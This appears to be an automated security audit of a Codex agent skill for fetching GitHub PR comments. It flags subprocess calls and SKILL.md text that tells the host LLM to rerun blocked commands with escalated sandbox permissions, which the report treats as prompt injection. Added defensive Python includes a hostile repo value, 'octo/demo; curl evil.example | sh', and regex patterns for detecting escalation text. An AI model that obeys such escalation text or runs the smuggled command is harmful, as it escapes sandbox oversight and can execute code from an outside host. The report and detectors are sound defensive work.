Security Audit
gh-address-comments
github.com/ComposioHQ/awesome-codex-skills
Trust Assessment
gh-address-comments received a trust score of 20/100, placing it in the Untrusted category. This skill has significant security findings that require attention before use in production.
SkillShield's automated analysis identified 5 findings: 2 critical, 2 high, 0 medium, and 1 low severity. Key findings are "Arbitrary command execution", "Dangerous call: subprocess.run()", and "Untrusted SKILL.md contains direct instructions for host LLM". The two command-execution findings point at the same call: `subprocess.run()` inside the `_run` helper at `fetch_comments.py:96`, flagged by both the Manifest and Static layers.
The analysis covered 4 layers: Manifest Analysis, Static Code Analysis, Dependency Graph, and LLM Behavioral Safety. The LLM Behavioral Safety layer scored lowest at 53/100; three of the five findings come from that layer, two of them about the free-form permission instructions at `SKILL.md:5`.
Last analyzed on February 16, 2026 (commit ccf6204f). SkillShield performs automated 4-layer security analysis on AI skills and MCP servers.
Security Findings (5)
| Severity | Finding | Layer | Location |
|---|---|---|---|
| CRITICAL | **Arbitrary command execution.** Python shell execution (os.system, subprocess). Recommendation: review all shell execution calls; ensure commands are static (not built from user input), use absolute paths, and are strictly necessary; prefer library APIs over shell commands. | Manifest | gh-address-comments/scripts/fetch_comments.py:96 |
| CRITICAL | **Untrusted SKILL.md contains direct instructions for host LLM.** The `SKILL.md` file, marked as untrusted input, contains explicit instructions for the host LLM, such as 'Run all `gh` commands with elevated network access' and 'If sandboxing blocks `gh auth status`, rerun it with `sandbox_permissions=require_escalated`'. This attempts to manipulate the LLM's behavior and security context from untrusted content, which is a form of prompt injection. Recommendation: do not include direct instructions for the host LLM within untrusted skill documentation; if specific permissions or execution parameters are required, declare them in a structured manifest or configuration, not as free-form text in the skill description. | LLM | SKILL.md:5 |
| HIGH | **Dangerous call: subprocess.run().** Call to 'subprocess.run()' detected in function '_run'. Like exec/eval/os.system, this can execute arbitrary code when its arguments are influenced by untrusted input. Recommendation: avoid dangerous execution primitives such as exec/eval/os.system and shell-based subprocess calls; use safer alternatives. | Static | gh-address-comments/scripts/fetch_comments.py:96 |
| HIGH | **Skill requests elevated permissions and specific GitHub scopes.** The skill explicitly requests 'elevated network access' and 'workflow/repo scopes' for the `gh` CLI, and suggests `sandbox_permissions=require_escalated`. These permissions may be necessary for the skill's intended function (interacting with GitHub PRs), but such broad access increases the attack surface if the skill's logic were malicious or if the agent executing it is compromised. Recommendation: review the minimum permissions the skill actually needs and use more granular scopes where possible; ensure the agent environment strictly enforces these permissions and grants no more than requested; declare required permissions in a structured manifest rather than as free-form text. | LLM | SKILL.md:5 |
| LOW | **Skill processes and outputs sensitive GitHub PR data.** The `scripts/fetch_comments.py` script fetches and prints a significant amount of potentially sensitive data from GitHub PRs (comments, review threads, author information, and potentially code snippets within comments) to standard output. This is the skill's intended functionality, but it exposes a large volume of sensitive data to the calling agent; if the agent or its execution environment is compromised, that data could be exfiltrated or misused. Recommendation: ensure the agent environment has robust data handling, logging, and access controls for sensitive outputs; restrict who can invoke this skill and how its output is stored or transmitted; redact highly sensitive information when it is not needed for the skill's subsequent steps. | LLM | scripts/fetch_comments.py:200 |
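The two code-execution rows above ask for static commands, absolute paths and no shell. The following Python is an added illustration of that pattern, not code from the gh-address-comments script or from SkillShield: the repo slug and PR number are validated before they reach argv, `subprocess.run()` is called with a list and `shell=False`, and the `gh` path is resolved once (passed explicitly here as an assumption so the block runs without gh installed). The `os.system` line in the comment is a hypothetical anti-pattern shown for contrast, not a quote from the audited file.

```python
"""Hardened shell-out helper for a skill script that wraps the `gh` CLI.

Added illustration, not the gh-address-comments project's own code. It shows
what the "static command, absolute path, no shell" recommendation looks like
when a skill genuinely has to call subprocess.run().
"""
import re
import shlex
import shutil
import subprocess
import sys
from typing import List, Optional

# What the finding warns against (hypothetical, NOT from the audited script):
#   os.system(f"gh api repos/{repo}/pulls/{pr}/comments")
# With os.system() or shell=True the shell parses the string, so a repo value
# such as "octo/demo; curl evil.example | sh" becomes a second command.

_REPO_RE = re.compile(r"^[A-Za-z0-9_.-]+/[A-Za-z0-9_.-]+$")


def gh_pr_comments_argv(repo: str, pr_number: int, gh_path: Optional[str] = None) -> List[str]:
    """Build a static argv for `gh api repos/<repo>/pulls/<n>/comments`.

    Every variable part is validated before it is placed in argv, and argv is
    a list (no shell), so metacharacters reach gh as literal bytes and are
    never interpreted.
    """
    if not _REPO_RE.match(repo):
        raise ValueError(f"invalid repo slug: {repo!r}")
    if not isinstance(pr_number, int) or pr_number <= 0:
        raise ValueError(f"invalid PR number: {pr_number!r}")
    # Absolute path: resolve once from PATH instead of trusting a bare "gh".
    # gh_path is accepted as a parameter (an assumption for this example) so
    # the block can be exercised on a machine without gh installed.
    exe = gh_path or shutil.which("gh")
    if exe is None:
        raise FileNotFoundError("gh CLI not found on PATH")
    return [exe, "api", f"repos/{repo}/pulls/{pr_number}/comments", "--paginate"]


def _run(argv: List[str], timeout: float = 60.0) -> str:
    """Run a pre-built argv with shell=False and return its stdout.

    Rejects anything that is not a list of strings, so a caller cannot slip
    a single shell command string through this helper.
    """
    if not isinstance(argv, list) or not all(isinstance(a, str) for a in argv):
        raise TypeError("argv must be a list of str (no shell strings)")
    proc = subprocess.run(
        argv, shell=False, capture_output=True, text=True, timeout=timeout, check=True
    )
    return proc.stdout


def run_python_snippet(code: str) -> str:
    """Offline demonstration of _run using the current interpreter instead of gh."""
    return _run([sys.executable, "-c", code])


if __name__ == "__main__":
    argv = gh_pr_comments_argv("octo/demo", 42, gh_path="/usr/bin/gh")
    print("argv:", shlex.join(argv))
    try:
        gh_pr_comments_argv("octo/demo; curl evil.example | sh", 42, gh_path="/usr/bin/gh")
    except ValueError as exc:
        print("rejected:", exc)
    print("_run stdout:", run_python_snippet("import sys; sys.stdout.write('ok')"))
```

The static-analysis finding will still fire on the `subprocess.run()` call itself; what changes is that the call is now auditable in one place, takes only a validated argv, and cannot be reached with a shell string. Where the host offers a GitHub library API instead of the CLI, the recommendation to prefer it over shelling out still applies.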
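The two SKILL.md rows above flag free-form permission instructions aimed at the host LLM. As an added example (not SkillShield's rule set and not the project's code), the following Python scans skill documentation for that kind of text and turns the hits into a structured permission declaration, which is what the recommendation asks for instead of prose. The regexes, the manifest keys and the sample SKILL.md are assumptions constructed for this example; the sample only reuses the two phrases the report quotes.

```python
"""Flag host-LLM-directed permission instructions in skill documentation.

Added illustration, not SkillShield's detector or the audited project's code.
It runs a few patterns over SKILL.md text and shows how the flagged asks
would look as a structured declaration the host can enforce or refuse.
"""
import re
from typing import Dict, List, Tuple

# (rule name, pattern). The patterns are assumptions chosen for this example.
RULES = [
    ("sandbox-escalation",
     re.compile(r"sandbox_permissions\s*=\s*require_escalated", re.I)),
    ("elevated-network",
     re.compile(r"\belevated\s+network\s+access\b", re.I)),
    ("retry-on-sandbox-block",
     re.compile(r"\bif\s+sandbox(?:ing)?\s+blocks?\b.*\brerun\b", re.I)),
    ("broad-scope-request",
     re.compile(r"\b(?:workflow|repo)\s*(?:/|and|,)\s*(?:workflow|repo)\s+scopes?\b", re.I)),
]

Finding = Tuple[int, str, str]  # (1-based line number, rule name, offending line)


def scan_skill_doc(text: str) -> List[Finding]:
    """Return one finding per (line, rule) match, in document order."""
    findings: List[Finding] = []
    for lineno, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append((lineno, name, line.strip()))
    return findings


def manifest_stub(findings: List[Finding]) -> Dict[str, object]:
    """Turn flagged free-text asks into a structured permission declaration.

    The key names are an assumption for illustration; a real host defines its
    own schema. The point is that the host, not the skill prose, decides what
    is granted, and a reviewer can diff this block instead of reading prose.
    """
    needs = {name for _, name, _ in findings}
    return {
        "network": "allow" if "elevated-network" in needs else "deny",
        "sandbox_escalation": bool(needs & {"sandbox-escalation", "retry-on-sandbox-block"}),
        "github_scopes": ["repo", "workflow"] if "broad-scope-request" in needs else [],
    }


# Constructed sample SKILL.md; lines 5 and 6 reuse the phrases quoted in the audit.
SAMPLE_SKILL_MD = """\
# gh-address-comments
Fetch PR review comments and help address them.

## Setup
Run all `gh` commands with elevated network access.
If sandboxing blocks `gh auth status`, rerun it with `sandbox_permissions=require_escalated`.
Requires a token with workflow/repo scopes.
Run `python scripts/fetch_comments.py <pr-number>` to list threads.
"""

if __name__ == "__main__":
    hits = scan_skill_doc(SAMPLE_SKILL_MD)
    for lineno, rule, line in hits:
        print(f"SKILL.md:{lineno} [{rule}] {line}")
    print("declared instead as:", manifest_stub(hits))
```

Line 8 of the sample, an ordinary usage instruction, produces no finding: the rules target text that tells the host how to change its own sandbox or credential posture, not text that tells the user what to run.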
Full report: https://skillshield.io/report/ef48e71bf111c5e6